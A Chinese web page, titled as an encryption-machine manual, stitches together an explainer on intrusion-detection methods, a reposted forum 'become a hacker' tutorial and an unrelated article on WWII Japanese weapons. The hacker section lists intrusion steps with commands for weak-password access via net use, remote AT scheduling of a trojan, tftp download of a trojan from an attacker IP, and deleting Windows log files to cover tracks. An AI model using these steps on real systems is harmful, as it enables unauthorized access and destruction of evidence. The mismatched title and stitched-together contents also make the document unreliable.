加密机操作手册

A. 简述入侵检测常用的四种方法

入侵检测系统所采用的技术可分为特征检测与异常检测两种。

1、特征检测

特征检测(Signature-based detection) 又称Misuse detection ，这一检测假设入侵者活动可以用一种模式来表示，系统的目标是检测主体活动是否符合这些模式。

它可以将已有的入侵方法检查出来，但对新的入侵方法无能为力。其难点在于如何设计模式既能够表达“入侵”现象又不会将正常的活动包含进来。

2、异常检测

异常检测(Anomaly detection) 的假设是入侵者活动异常于正常主体的活动。根据这一理念建立主体正常活动的“活动简档”，将当前主体的活动状况与“活动简档”相比较，当违反其统计规律时，认为该活动可能是“入侵”行为。

异常检测的难题在于如何建立“活动简档”以及如何设计统计算法，从而不把正常的操作作为“入侵”或忽略真正的“入侵”行为。

(1)加密机操作手册扩展阅读

入侵分类：

1、基于主机

一般主要使用操作系统的审计、跟踪日志作为数据源，某些也会主动与主机系统进行交互以获得不存在于系统日志中的信息以检测入侵。

这种类型的检测系统不需要额外的硬件．对网络流量不敏感，效率高，能准确定位入侵并及时进行反应，但是占用主机资源，依赖于主机的可靠性，所能检测的攻击类型受限。不能检测网络攻击。

2、基于网络

通过被动地监听网络上传输的原始流量，对获取的网络数据进行处理，从中提取有用的信息，再通过与已知攻击特征相匹配或与正常网络行为原型相比较来识别攻击事件。

此类检测系统不依赖操作系统作为检测资源，可应用于不同的操作系统平台；配置简单，不需要任何特殊的审计和登录机制；可检测协议攻击、特定环境的攻击等多种攻击。

但它只能监视经过本网段的活动，无法得到主机系统的实时状态，精确度较差。大部分入侵检测工具都是基于网络的入侵检测系统。

3、分布式

这种入侵检测系统一般为分布式结构，由多个部件组成，在关键主机上采用主机入侵检测，在网络关键节点上采用网络入侵检测，同时分析来自主机系统的审计日志和来自网络的数据流，判断被保护系统是否受到攻击。

B. 初学电脑—— 高手

黑客是怎样炼成的
编者：关于黑客是怎样炼成的，网上有了n个版本了。不过多数是哗众取宠。
看看这个吧，是我在网上所能看到的最详细的教程了．相信对你一定会有好处的。

基础：
如何去学习
·要有学习目标
·要有学习计划
·要有正确的心态
·有很强的自学能力

学习目标
·1.明确自己的发展方向(你现在或者将来要做什么,程序员?安全专家?网络黑客等)
·2.自己目前的水平和能力有多高
·能简单操作windows2000
·能简单配置windows2000的一些服务
·能熟练的配置Windows2000的各种服务
·能熟练配置win2000和各种网络设备联网
·能简单操作linux,Unix,Hp-unix, Solaris中的一种或者多种操作系统
·能配置cicso,huawei,3com,朗迅等网络设备
·会简单编写C/C++,Delphi,Java,PB,VB,Perl
·能简单编写Asp,Php,Cgi和script,shell脚本

·3.必须学会不相信态度,尊重各种各样的能力
·不要为那些装模做样的人浪费时间
·尊重别人的能力,
·会享受提高自己能力的乐趣.
·在知道了自己的水平和能力之后就要开始自己的目标了
·--------安全专家
·--------黑客
·--------高级程序员
·黑客是建设网络,不是破坏网络, 破坏者是骇客;
·黑客有入侵的技术,但是他们是维护网络的,所以和安全专家是差不多的;
·因为懂得如何入侵才知道如何维护
·因为懂得如何维护才更要了解如何入侵
·这是 黑客与安全专家的联系
·但,他们都是在会编程的基础上成长的!
·下面我们开始我们的学习计划!

学习计划
有了学习计划才能更有效的学习

安全学习计划
不奢求对win98有多么精通,我们也不讲解win98如何应用,如何精通,我们的起步是win2000 s
erver,这是我们培训的最低标准,你对英语有一定的了解也是必不可少

最基础
·a.会装win2000,知道在安装的时候有两种分区格式,NTFS与FAT32 及他们的区别,知道win2
000可以在安装的时候分区,格式化硬盘, 可以定制安装,可以定制自己需要安装的一些组件
,如果有网络适配器,可以直接加入域中 学习点:NTFS和FAT32分区的不同 各个组件的作用
域的定义
·b.知道如何开,关机 知道注销的用处
·c.知道win2000下面各主要目录的作用 Documents and Settings,WINNT,system32 Progra
m Files
·d.知道管理工具里面各个组件的定义
·e.学会应用命令提示符cmd(dos)
·f.知道计算机管理里面的各个选项的不通
·g.知道win2000强大的网络管理功能
·h.能非常熟练的操作win2000
·i.知道IP地址,子网掩码,网关和MAC的区别

进阶
·A.配置IIS,知道各个选项的作用
·B.配置DNS,DHCP
·C.配置主控制域,辅助域
·D.配置DFS
·E.配置路由和远程访问

·F.配置安全策略IPSEC
·G.配置service(服务)
·H.配置磁盘管理,磁盘分额
·i. 配置RAID(0,1,0+1,5)
·J.路由器的安装与简单配置
·K.交换机的安装与简单配置
·L.常见的VPN,VLAN,NAT配置
·M.配置常见的企业级防火墙
·N.配置常见的企业级防病毒软件

高级
·之前我们学到的是任何一个想成为网络安全专家和黑客基本知识中的一部分
·你作到了吗??
·如果你做到了,足以找到一份很不错的工作!

配置负载均衡
·配置WIN2000+IIS+EXCHANGE+MSSQL+SERVER-U+负载均衡+ASP(PHP.CGI)+CHECK PIONT(ISA
SERVER) ·
·配置三层交换网络 ·
·配置各种复杂的网络环境
·能策划一个非常完整的网络方案 ·
·能独自组建一个大型的企业级网络 ·

·能迅速解决网络中出现的各种疑难问题

结束
·在你上面的都学好了,你已经是一个高级人才了,也是我们VIP培训的目标!
·可以找到一份非常好的工作
·不会再因为给女朋友买不起玫瑰而发愁了!

安全：
导读
·系统安全服务(SYSTEM)
·防火墙系统(FIREWALL)
·入侵检测(IDS)
·身份验证(CA)
·网站监控和恢复(WEBSITE)
·安全电子商务(E-BUSINESS)
·安全电子邮件(E-MAIL)
·安全办公自动化(OA)
·Internet访问和监控(A&C)
·病毒防范(VIRUS)
·虚拟局域网(VPN)

系统安全服务

·系统安全管理
·系统安全评估
·系统安全加固
·系统安全维护
·安全技能学习

系统安全管理
·信息系统安全策略
·信息系统管理员安全手册
·信息系统用户安全手册
·紧急事件处理流程

系统安全评估
1、系统整体安全分析
· 分析用户的网络拓扑结构，以找出其结构性及网络 配置上存在的安全隐患。
· 通过考察用户信息设备的放置场地，以使得设备物理上是安全的。
· 分析用户信息系统的管理、使用流程，以使得系统 能够安全地管理、安全地使用
2、主机系统安全检测
· 通过对主机进行安全扫描，以发现系统的常见的安全漏洞。
· 对于特定的系统，采用特别的工具进行安全扫描。
· 根据经验，对系统存在的漏洞进行综合分析。
· 给出系统安全漏洞报告。

· 指出各个安全漏洞产生的原因以及会造成的危险。
· 给出修复安全漏洞的建议
3、网络设备安全检测
· 通过对网络进行安全扫描，以发现网络设备的安全漏洞。
· 根据经验，对网络设备存在的漏洞进行综合析。
· 给出网络设备安全漏洞报告。
· 指出各个安全漏洞产生的原因以及会造成的险。
· 给出修复安全漏洞的建议。

安全系统加固
·为用户系统打最新安全补丁程序。
·为用户修复系统、网络中的安全漏洞。
·为用户去掉不必要的服务和应用系统。
·为用户系统设置用户权限访问策略。
·为用户系统设置文件和目录访问策略。
·针对用户系统应用进行相应的安全处理。

安全系统维护
·防火墙系统维护，安全日志分析
·IDS系统维护，安全日志分析
·VPN系统维护，安全日志分析
·认证系统维护，安全日志分析

·服务器、主机系统，安全日志分析
·其它各类安全设施维护及日志分析

安全技能培训
·网络安全基础知识
·网络攻击手段演示和防范措施
·防火墙的原理和使用
·VPN的原理和使用
·漏洞扫描工具的原理和使用
·IDS（入侵检测系统）的原理和使用
·身份认证系统的原理和使用
·防病毒产品的原理和使用
·系统管理员安全培训
·一般用户安全培训

防火墙系统
·防火墙的定义
·防火墙的分类
·包过滤防火墙
·应用网关防火墙
·状态检测防火墙
·一般企业防火墙配置

·政府机构防火墙配置
·涉密网络保密网关配置
·高可用性和负载均衡防火墙系统
·高速防火墙系统

防火墙的定义
·用以连接不同信任级别网络的设备。
·用来根据制定的安全规则对网络间的通信进行控制

防火墙的分类
·包过滤 (Packet Filters)
·应用网关 (Application Gateways)
·状态检测(Stateful Inspection)

包过滤防火墙
·包 过 滤 技 术
·主要在路由器上实现，根据用户定义的内容（如IP地址、端口号）进行过滤。包过滤在网
络层进行包检查与应用无关。
· 优 点
· 具有良好的性能和可伸缩性。
· 缺点
· 由于包过滤技术是对应用不敏感的，无法理解特定通讯的含义，因而安全性很差。

应用网关防火墙
·应用网关技术
·第二代防火墙技术，其在应用的检查方面有了较大的改进,能监测所有应用层，同时对应
用“内容”（Content Information）的含义引入到了防火墙策略的决策处理。
· 优点
· 安全性比较高。
· 缺点
· 1、该方法对每一个请求都必须建立两个连接，一个从客户端到防火墙系统，另一个从
防火墙系统到服务器，这会严重影响性能。
· 2、防火墙网关暴露在攻击者之中。
· 3、对每一个代理需要有一个独立的应用进程或 daemon 来处理， 这样扩展性和支持
新应用方面存在问题。

检测状态防火墙
· 属第三代防火墙技术，克服了以上两种方法的缺点，引入了OSI全七层监测能力，同时
又能保持 Client/Server的体系结构，也即对用户访问是透明的。
· 防火墙能保护、限制其他用户对防火墙网关本身的访问。
· 状态检测技术在网络层截获数据包后交给INSPECT Engine,通过 INSPECT Engine 可以
从数据包中抽取安全决策所需的所有源于应用层中的状态相关信息，并在动态状态表中 维
持这些信息以提供后继连接的可能性预测。该方法能提供高安全性、高性能和扩展性、高伸
缩性的解决方案。

入侵检测系统
·处理攻击时遇到的典型问题
·解决入侵的方法和手段
·基于网络的入侵检测
·基于主机的入侵检测
·入侵检测系统典型配置

处理攻击时遇到的问题
·获得的信息不足
·不知到网络上发生了什么事。
·无法判定系统是否已经被入侵。
·信息不准确
·人员少
·没有足够的人员维护管理。
·缺乏规范的处理程序
·发现攻击时如何反应?
·下一步该如何处理?

解决入侵的方法和手段
·采用入侵实时入侵监控系统（IDS）
·对系统、网络中发生的事件进行实时监控。

·当发生入侵事件时能即时反应。
·对入侵事件进行详细记录并跟踪。

基于主机的入侵检测
·软件模块安装在包含有重要数据的主机上
·监视操作系统的日志以发现攻击的特征。
·监视代理所处主机上的所有进程和用户.
·监视暴力登录攻击（brute-force login）, 试图改变或绕过安全设定，及特权的滥用等
。
·当新的日志产生时，为了减小对CPU的影响，代理程序暂时中断。

基于网络的入侵检测
·软件安装在专门的主机上，放置于关键的网段
·将配置该软件主机的网卡设置为混杂模式，使得该主机能接受网段上所有的包。
·分析数据包以判断是否有黑客攻击。
·监视网段上的所有数据。
·对网络的流量无任何影响。
·能检测到 denial of service attacks, unauthorized access attempts, pre-attack s
cans等攻击。

身份认证系统
·用户身份认证的方法

·不同认证方法的安全级别
·用户身份认证的常用方式
·解决问题的方法
·目前比较成熟的双因素认证方法

用户身份验证
·你知道的一些东西
· 密码, 身份证号，生日
·你有的一些东西
· 磁卡, 智能卡,令牌, 钥匙
·你独有的一些东西
· 指纹,声音，视网膜

密码是不安全的
·可以破解密码的工具太多
·大多密码在网络中是明文传输的
·密码可以网络离线时被窥测
·密码和文件从PC和服务器上被转移了
·好记的密码容易被猜到,不易猜测的密码又太难记

解决方法
·使用混合的工具:如IC卡+PIN

网站监控与恢复系统
·典型的Web服务器应用
·Web服务器存在的安全问题
·网站安全解决方法

典型web服务器应用
·Internet-->路由器-->防火墙-->web站点
· |
· |
· 内部网
·所有的放在防火墙后面

Web服务器存在的安全问题
· 网页被非法篡改是网站内容提供者最头痛的问题。在采用防火墙后，Web服务器本身的漏
洞成为了网站被黑的主要问题。
· Web应用服务器(如IIS,Apache中存在着大量的安 全漏洞.)
· 用户自己开发的CGI、ASP、PHP应用中存在着大量潜在的漏洞。

网站安全
·采用Web服务器监控与恢复系统

·该系统提供对网站文件内容的实时监控，发现被改动后立即报警并自动恢复。

电子商务安全系统
·典型的电子商务应用
·电子商务中存在的安全问题
·电子商务的安全解决方法
·实时数据交换系统

典型电子商务应用
·Internet--->防火墙--->Web服务器
· || |
· || |
· 内部网(数据库)

电子商务中存在的安全问题
·1、Web服务器端
·Web应用服务器（如IIS、Apache中存在着大量的安全漏洞。用户自己开发的CGI、ASP、PH
P应用中存在着潜在的漏洞。
· 黑客通过这些漏洞攻击Web服务器，可非法篡改网页，造成恶劣影响，动摇了电子商务使
用者的信心。
· 甚至可获得Web服务器上大量的敏感资料，如用户的信用卡号，用以连接内部数据库的帐
号和口令。

· 可能通过控制Web服务器，来攻击内部数据库。

电子商务中存在的安全问题
·2、SSL协议
·SSL加密强度低。由于浏览器默认的加密模块只支持40位的低强度加密，而且即使在浏览
器中安装更高位的加密模块，由于WEB服务器不提供对高位SSL链接的支持同样无法实现高强
度SSL加密链接。
· 无法解决电子商务中的用户签名。SSL链接建立WEB服务器和用户浏览器之间的安全通道
只能保证在安全通道内的信息不被窃听或篡改，并不能对用户发送的信息进行签名以保证信
息的有效性和不可抵赖性，而这正是电子商务中必须解决的问题。

电子商务的安全解决方法
·将WEB服务器分为两部分：一般内容的WEB服务器和交易WEB服务器。
· 一般内容的WEB服务器放置在DMZ区内，采用WEB站点监控和恢复系统保护，防止主页被非
法改动。
· 交易WEB服务器放置在内部网内，通过一台物理分隔的实时数据交换系统将其与DMZ区相
连。
· 在客户机和服务器端安装SSL代理，从而获得128位的高强度加密通道

实时数据交换系统
·将系统外部 Web服务器和内部应用Web服务器物理隔开.
·外部Web服务器用于存放一般的信息，内部Web服 务器用于存放敏感信息，并和内部数据

库连接。
·外部用户通过http访问位于DMZ区内的一般Web服务器。
·当进行交易时，用户需访问位于内部网内的应用服务器。
·https连接首先到达实时数据交换系统的虚拟外部Web服务器，实时数据交换系统将https
协议解开，只将https连接的数据内容拷贝到虚拟内部Web服务器，虚拟内部Web服务器将使
用该数据重新发起https连接到实际的内部应用Web服务器.
·内外通过实时数据交换系统进行数据交换，无任何协议和连接穿过实时数据交换系统。
·即使DMZ区的Web服务器受到攻击, 攻击者也的不到任何有用的信息

安全电子邮件系统
·电子邮件的安全问题
·安全电子邮件的解决方法
·一个安全邮件的使用过程

电子邮件的安全问题
·如何保证发送的敏感信息不被泄漏
·如何保证发送的信息不被篡改
·如何确认发件人的真实身份
·如何防止发件人的抵赖行为

安全电子邮件的解决方法
·将PKI体系应用到邮件系统中

·邮件的加密和解密以实现数据的保密。
·邮件的数字签名（鉴别）实现发件人认证和不可抵赖。
·完整性校验功能防止信息传输过程中被篡改可靠的安全性。
·采用公开密钥和对称密钥相结合的密钥体系。
·支持128bit对称密钥算法和1024bit公开密钥算法。本帖地址为：http://www.nohack.cn/bbs/thread-4689-1-1.html
点击这里复制此帖网址

是水何必装纯、是人何必称神！

UID409 帖子541 精华0 积分576 手册币70 阅读权限50 性别男 在线时间68 小时 注册时间2005-10-16 最后登录2007-11-11 查看详细资料
引用 使用道具 报告 回复 TOP
收藏此页到：

兜兜裏囿糖
Safety少尉

个人空间 发短消息 加为好友 当前离线 2# 大 中 小 发表于 2006-4-17 13:12 只看该作者
办公自动化系统的安全问题
· 如何保证发送的敏感信息不被泄漏
· 如何保证发送的信息不被篡改
· 如何确认发件人的真实身份
· 如何防止发件人的抵赖行为

安全办公自动化系统的解决方法
·将PKI体系应用到办公自动化系统中
·工作流信息的加密和解密以实现数据保密
·工作流信息的数字签名（鉴别）实现发件人认证和不可抵赖。
·完整性校验功能防止信息传输过程中被篡改可靠的安全性。
·采用公开密钥和对称密钥相结合的密钥体系
·支持128bit对称密钥算法和1024bit公开密钥算法。

Internet访问及控制系统
·Internet使用存在的问题

·Internet使用的解决方法
·内容缓存系统
·Internet站点过滤系统

Internet访问存在的问题
·Internet接入带宽不足，访问比较慢。
·大量的用户访问相同的内容，造成带宽的进一步拥挤。
·在上班时间里大量的Internet访问是与业务无关的。
·有人使用公司的Internet系统访问色情网站。
·有人使用公司的Internet系统访问反动站点。
·管理人员无法知道Internet系统的使用情况。

Internet访问的解决方法
· 对于问题一，采用内容缓存系统。
· 对于问题二，采用Internet 站点过滤系统。

内容缓存系统
·1、Client 发起http连接请求
·2、Proxy 收到请求后将检查内部缓存内是否有所需内容，若有，则返还给Client。
·3、若无，则Proxy根据请求向目的服务器发起请求。
·4、Web服务器将内容返回到Proxy服务器。
·5、Proxy服务器将得到的内容发回给Client，并在自己的缓存中保存一份。

Internet站点过滤系统 (一)
·1、Client 发起http连接请求
·2、连接到达防火墙时防火墙将URL送到WebSense Server 检查。
·3、WebSense 将审查结果返回到防火墙。
·4、防火墙根据其策略决定是否让该连接通过。
Internet站点过滤系统 (二)
·1、Client 发起http连接请求
·2、Proxy 受到请求后将URL送到WebSense Server检查。
·3、Proxy根据返回的结果决定是否接收该连接请求。

病毒防范系统
· 互连网时代对防病毒系统的要求
· 计算机病毒解决方法
· 典型病毒防范系统部署

互联网时代对防病毒系统的要求
· 由于计算机的联网使用，使得病毒传播的途径大为增多：网络文件共享、电子邮件、Int
ernet文件下载，传播速度也大为加快。
· 新病毒的出现速度加快，用户的防病毒软件的病毒特征码没能及时更新。
· 目前已出现了恶意的Java、ActiveX，当使用者浏览到包含这些代码的网页时，会造成安
全问题。

· 一些来历不明的电子邮件程序或下载的程序中带有特洛依木马，可能会造成受害者的主
机被他人控制。

计算机病毒解决方法
· 从系统的观点考虑病毒的防范，在所有病毒传输的途径上均配置防病毒软件，如客户端
（Win98、 · Win2000)、文件服务器（NT、Netware）、邮件服务器（Exchange、Lotus
Notes）、Internet接入系统（Proxy、Firewall)等。
· 整个病毒防范系统采用集中管理的方式，病毒特征码统一更新，安全策略集中设定，从
而使得整个网络系统的病毒特征码得到快速更新。
· 通过在客户端的浏览器和Proxy、Firewall中嵌入病毒检查软件，来防范下在程序中带有
的病毒和可能的恶意Java、ActiveX等可执行代码的攻击。

VPN（虚拟私有网）
· 数据加密分类
· 物理线路加密
· 数据链路加密
· 网络层加密—IPSec
· 传输层加密—SSL

数据加密类型
·物理层->物理层 物理线路加密
·数据链路层->数据链路层 (路由器访问)

·在数据链路层(如PPP）进行加密 L2TP、PPTP、L2F
·网络层->网络层(路由器 防火墙 主机)
·在网络层 （如IP）进行加密 IPSec
·传输层->传输层 (对TCP进行加密 SSL)
·应用层->应用层(在应用层 (如TCP）进行加密 S/MIME、SET、SSH)

物理线路加密
· DDN 加密机
· 帧中继加密机
· 异步拨号Modem
· ISDN线路密码机
· ATM加密机

注:传输层加密
·Secure Sockets Layer (SSL) 是一个端到端的Internet 安全协议，通过采用数字证书，
它提供了数据加密、身份认证的功能。SSL建立在传输层，它为客户机和服务器在应用级建
立起一个端到断的安全会话。
·SSL代理—128位的高强度加密模块

结束语·恭喜你:
·学完这些并且可以熟练应用,已经是一个真正的网络安全专家了!
·希望此时的你旁边有个温柔稍有点调皮的女朋友,为这孤独而寂寞的网络添加一点跳动的

色彩!

黑客编：
必须要掌握的几个命令
·Net
·netsh
·Ftp
·hostname
·Telenet(nc)
·tracert
·At
·Tftp
·Netstat
·Regedit
·Ping

必须要掌握的几个协议
·http
·dns
·ftp
·Pop
·Smtp

·Icmp
·Udp
·tcp

开始
·掌握了黑客攻击的方式和手段后,那么学习黑客就简单多了!
·因为你掌握了这些,剩余的就是使用工具入侵
·熟悉掌握一套自己用的黑客工具

高级
·自己编写专用的黑客工具
·自己发现系统漏洞

黑客入侵手段
·收集信息:
· 收集要入侵的目标信息
· IP,域名,端口,漏洞,位置

弱口令
·在nt\2000\xp\2003中弱口令可以用
·Net use \ip “password” /user:user
·如果目标机开3389服务,可以直接连接

·在sql的sa弱口令,可以用sql连接器直接 ·登陆

后门木马
·如果有ipc$共享,可以过去木马后门
·用at启动
·AT \ip time /INTERACTIVE
·如果可以得到shell,也可以用tftp
·Tftp.exe –i ip get *.* *.*
·然后直接安装 ·如果有3389,可以自己建一个iis,下载 直接运行

密码破解
·远程破解mysql,mssql,ftp,mail,共享密码
·本地破解管理员(administrator)密码

缓冲溢出
·可以用缓冲溢出攻击,
·比如流行的webdev,rdcom模块漏洞
·可以直接得到system管理权限
·缓冲溢出后的一般现象是:
·Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>

Web服务漏洞
·例如:
·Unicode漏洞遍历磁盘和执行程序
·二次编码漏洞遍历磁盘和执行程序
·.HTR漏洞查看源代码

嗅探监听
·例如:
·针对web监听
·针对mail监听
·工具如:sinffer , iris

欺骗攻击
·例如:
·运用arp欺骗攻击

伪装欺骗
·常见的如:mail病毒
·把一个文件改名字甚至图标,欺骗对方执行

社会工程学

·例如:
·QQ聊天诱惑
·EMAIL信息
·电话
·诱惑

拒绝服务
·例如:
·Dos攻击
·Ddos攻击

利用跳板
·利用自己的肉鸡作为跳板攻击别的机器
·My PC------>跳板(肉鸡)--->目标

路由器漏洞
·如:
·原始密码
·程序漏洞

防火墙
·利用欺骗攻击防火墙,导致防火墙功能失效

·利用防火墙的模块漏洞

unix/linux
·NetWare Linux unix solais Solaris hp-unix Aix 等
·这些目前先不讲解

精通黑客工具
·必须有一套自己可以完全掌握的黑客工具
·如端口扫描 Nscan,bluescanport
·监听工具:sinffer iris
·telnet工具:nc
·扫描工具:sss,nmap, LANguard
·后门工具:radmin,winshell
·密码破解:lc4
·远程管理:pcanywhere
·会使用各种经典的黑客工具

清除日志
·在你入侵机器以后,离开的时候,要完全清除
·自己在那台机器上留下的痕迹
·例如清除
·Del C:\WINNT\system32\LogFiles\*.*

·Del C:\WINNT\system32\*.log
·Del C:\WINNT\system32\*.txt
·Del C:\WINNT\*.log
·Del c:\winnt\*.txt

如果你不清除日志
·当目标机器的管理员发现你的证据
·完全可以让你在大墙内渡过一段日子

黑客
·当你完全掌握这些后
·你就成为了一名小黑客

高级
·编写自己的黑客工具
·发现系统漏洞

高级黑客
·目前你足以成为一个高级黑客了

真正的黑客
·精通各种网络协议

·精通操作系统
·精通编程技术
·精通安全防护
·不搞破坏
·挑战技术难题

结束
·想学好这些,并不是靠别人给你的,而是靠自己的努力,自己的自学得到的!
·别人只能指导你,怎么去做,只能告诉方法,
·真正的实施是你自己,经过N*N个日夜努力换来的
·不要一个问题问多次,要多动手,动脑!
·Google里面有太多的答案,为什么我搜索不到?因为你的关键字用的不对!
·黑客基地是为了培养出一批优秀的网络人才,让更多想学习网络的爱好者有一个理想的学
习环境
·这三篇幻灯片是我们多年的经验得到的!
·很有价值,望好好保存!仔细研究!

技术巅峰
·希望我们能在这里相聚!

本篇文章来源于 黑客手册技术论坛
原文链接：http://www.nohack.cn/bbs/thread-4689-1-1.html

C. 二战时日本那些“脑洞大开”的武器设计，这算是“超前”吗

1905年，日本卑鄙的击败了沙俄帝国海军，成为世界性强国。

虽然在第一次世界大战期间与协约国结盟，但日本帝国在凡尔赛遭到冷落后，改变了对其盲目跟随的态度。

20世纪30年代，日本尝试与纳粹德国结盟，开始了一系列侵略运动，努力在太平洋地区站稳脚跟，不过后来日本的一系列行动最终将美国硬生生的给拖入到战场上来。

日本也有自知之明，知道自己将要面对的对手的实力有多强悍，不管是在资源、经济还是在工业实力还是科学技术方面，都无法与其长期抗衡，他们应该做的就是要在短期内，出其不意的将美国彻底击败，让这个庞然大物失去爪牙，为此，日本陆军加速研制和装备先进的常规武器、自杀攻击武器，甚至是生物和化学武器，事实上，日本的战争指挥者根本不在乎“日内瓦议定书”上关于禁止使用化学武器的规定，相反，他们认为被禁止的武器是特别有效的，除此之外，日本还加大研发力度，在超前技术和概念武器上下功夫，想以最新式、最先进的武器出其不意的来打击美国。

在战争期间，日本研发了上百件高度概念化的武器，不过很大一部分都未能真正的进入战场，今天就让我们看看其中具有代表性的几款概念装备或者战术。

气球炸弹

当纳粹德国向英吉利海峡投掷V2火箭时，日本人也在制造他们自己的“复仇武器”，虽然日本在当时无法研制类似德国那样的洲际导弹，但是参谋本部却提出了气球炸弹的想法。

为了实现这一武器概念，日本人计划把炸弹装在气球上，气球沿着气流向美国飞行，大约经过5000英里到达太平洋西北部的森林地区爆炸，并引发大规模的森林火灾，这将转移美国当时稀缺的战争资源。

这些气球是用塑料纸制作的，用淀粉粘在一起，里面装满了氢气，直径超过10米，能吊起大约450公斤的物体，气球上装备有一枚14公斤重的破片炸弹。

日本人对气球的飞行轨迹进行了编程，如果气球上升到1.1万米以上高空时，就会释放氢气，如果气球下降到1万米以下，则会抛下装满沙子的负载袋，使用机载高度计计量，三个装满沙子的负载袋与炸弹一起悬挂在气球下面，每个负载袋的重量在1到3公斤之间，这些袋子的脱离程序是成对的释放的，这样可以保持气球的平衡，按照日本人的想法，气球在飞行时由于温度的变化白天会上升高度，而晚上都会掉下来，直到压载袋耗尽为止，这时气球和它携带的炸弹就会落在它下面的任何东西上。

听起来像个笑话，不过第一批气球还真的于1944年末被释放了出去，11月5日在加利福尼亚州圣佩德罗附近降落，第二天，他们到达怀俄明州的塞莫波利斯，有些甚至降落在加拿大，根据美国方面的记载总共约有285次经证实的着陆或目击事件。

1945年3月5日，六名美国人在俄勒冈州试图将气球从森林拉回营地时被其中一个气球上的炸弹杀死。

巨型潜艇

日本人在战争期间曾经秘密建造了三艘巨型潜艇，保持着有史以来最大的传统动力潜艇的记录，作为日本统治太平洋计划的一部分，他们被设计用来偷袭和拦截巴拿马运河上过往的军舰和船只。

潜艇配备了三架M6A1型飞机，可携带鱼雷或者是超过800公斤的炸弹，他们被安置在一个防水的、耐压的机库里，飞机是从艇首的弹射器上发射，三架飞机都可以在潜艇浮出水面后的45分钟内组装完毕，并完成加油、装备和发射的全过程。

它甚至还设计了浮潜管，上面覆盖着一种厚厚的橡胶状物质，旨在吸收雷达和声纳信号。

自杀式潜水服

这些特殊潜水服是专门为日本特种部队设计的，目的是抵御盟军对日本本土的入侵，这些潜水服上装备有一枚地雷，里面装着15公斤炸药。

潜水员负重9公斤重的铅，可以在水下行走多达6个小时，在5-7米的深度，具体使用方法是潜水员行走至敌舰的船体底部，然后引爆身上的炸药，以此来击沉敌人军舰。

目前尚不清楚这套潜水服是否真正被使用过，但有报道称美国步兵登陆艇和一艘测量船遭到自杀游泳者的袭击。

“紫色”加密机

德国的Enigma机器可能是第二次世界大战中最着名的加密设备，但它绝不是唯一的加密装置，1937年，日本人发明了97打字机，因其在日本2597年时的发明而得名，这款加密设备更出名的是它的美国代号：紫色。

这台机器由两台打字机和一个带有25个字符字母交换板的电动转子系统组成，就像启发它的Enigma机器一样，可以手动输入明文或未加密的信息，不过它最重要的创新是第二台电动打字机，它将加密的信息打印在一张纸上(Enigma以闪烁的灯光形式呈现文本)。因此，只需要一个人就可以操作它，由于日本人每天都在更换密码，所以密码破解者无法在信息中找到模式。

MXY-7 OKA 飞机

随着战争的进行，以及日本人对神风自杀式攻击机的改进，他们开始明确地为此目的研制飞机。横须贺MXY-7是一种火箭推进飞机，于1944年9月首次亮相，为了制造这台机器，日本人尽可能少地使用重要的原材料，而飞机的结构也非常的简陋。

战斗时，由三菱G4M的机身下携带着OKA，直到接近攻击目标时这种飞机才被释放出去，在接近目标之前，这架飞机尽量以滑翔的方式靠，最后时刻点燃火箭推进器，以高速冲向攻击目标，玉石俱焚。

这架飞机上装备了一枚2643磅的炸弹，它的高速使得它几乎不可能被防空火力拦截，也就是说，与母机一起飞行时，它非常脆弱，但是一旦火箭点火，虽然很难驾驶，但敌人想要拦截也几乎是不可能的事情，虽然使用起来有一定的限制，但至少有一艘美国驱逐舰被这种武器击沉。

J8M火箭动力拦截器飞机

如果你认为这看起来像德国的梅塞施密特163科米，你是对的。

J8M1本应是先进的纳粹飞机的一个许可证制造的复制品，但德国人无法向日本运送一架实体战机(一艘载有真正的梅塞施密特163飞机的德国潜艇在前往日本的途中被击沉)，这就使得日本设计师不得不从飞行操作手册和有限的技术蓝图中逆向设计这架先进的攻击飞机。

事实上，考虑到盟军在欧洲的轰炸行动，日本人渴望建造一架拦截飞机，军队指挥者担心，类似的轰炸在日本展开只是时间问题，由于B-29的飞行高度，大多数日本战斗机无法到达，因此Me 163被视为解决问题的最佳方法。

尽管没有一架实体机可供设计参考，但在战争结束前，日本人已经测试了一架原型飞机，这就是J8M，1945年7月7日，J8M在控制中心进行了首飞，不过这次飞行是短暂，并且还是灾难性的，虽然起飞阶段不错，但在爬升过程中发动机失灵，飞机直接坠毁，试飞飞行员当场死亡，不过日本人不甘心，又建造了六架原型机进行试飞，不过直到战争结束也没有一架顺利通过测试。

O-I超重型坦克

日本人通常不太在意自己的坦克，尽管他们确实有一些相当好的坦克，包括97式中型坦克，因为日本的对外战争除中国以外，大部分都是海空军作为主力，陆军只是充当辅助角色（虽然当时的空军还归陆军指挥），不过到了战争后期，他们有了一个雄心勃勃的想法，按照当时的想法如果不是疯子的话，是不会想出如此“丧心病狂”的设计的，那就是建造超重坦克，我们都知道日本的坦克一直都是一小巧轻便为主，重型坦克几乎没有。

而O-I超重型坦克的吨位是绝对巨大的，设计重量100至120吨，驾驶它需要11人共同来完成，这款坦克的有三座炮塔，一门主炮和两门副炮，一份未经证实的报告称，其中一辆坦克被派往满洲，但其真正的战斗力不得而知

Ku-go 死亡射线

喜欢开发另类战斗方式的日本人也曾积极开发一种死亡射线，这是一种集中的能量束，可以将数百英里外的飞机击落，根据战后被美军没收的文件中显示，日本人的死亡射线研究工作早在1939年就开始了，研究人员开发了一种高功率磁控管，可以产生辐射束，物理学家SinitiroTomonaga的团队开发了一种直径为8英寸(20厘米)的磁控管，输出功率为100 kW，然而，这项技术是否能像科幻小说中的死亡射线一样发挥作用是值得怀疑的。计算表明，如果光束聚焦得当，可能会在1000码的距离内杀死一只兔子，但前提是兔子至少能在5分钟内完全静止不动。

飞行坦克

二战期间日本军队面临的主要问题之一是从一个岛屿到另一个岛屿运输重型装备，如坦克，一种潜在的解决办法是以飞行的形式，或者更确切地说是滑翔坦克。

这些轻型坦克的特点是装备有可拆卸的机翼，尾翼(稳定在飞机尾端的表面)和能够起飞车体，挂载在三菱Ki-21“萨利”重型轰炸机上，到达作战区域后它就会像滑翔机一样滑翔到目的地，降落后开始执行各种任务。

Z型超级轰炸机

就像纳粹美国轰炸机计划一样，日本帝国希望有一架能够到达北美的洲际轰炸机。随着战争的进行，日本人迫切需要类似于美国B-29这种类型的轰炸机。

